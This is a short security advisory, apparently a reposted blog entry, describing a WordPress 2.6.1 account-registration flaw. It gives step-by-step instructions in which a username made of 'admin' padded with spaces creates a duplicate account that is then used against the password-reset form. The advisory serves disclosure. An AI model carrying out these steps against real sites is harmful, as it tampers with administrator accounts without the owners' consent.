A vulnerability in WordPress's way of handling new user registration allows attackers to create a duplicate 'admin' account whose email address is set to a value different than the default one. This is then used with the password recovery mechanism to retrieve the password of the true 'admin' account.
Vulnerable Systems:
* WordPress version 2.6.1
Exploit:
1. Go to URL: server.com/wp-login.php?action=register
2. Register as:
login: admin x (the user admin[55 space chars]x)
email: your email
Now, we have duplicated 'admin' account in database
3. Go to URL: server.com/wp-login.php?action=lostpassword
4. Write your email into field and submit this form
5. Check your email and go to reset confirmation link
6. Admin's password changed, but new password will be send to correct admin email
Additional Information:
The information has been provided by irk4z.
The original article can be found at: http://irk4z.wordpress.com/
No comments:
Post a Comment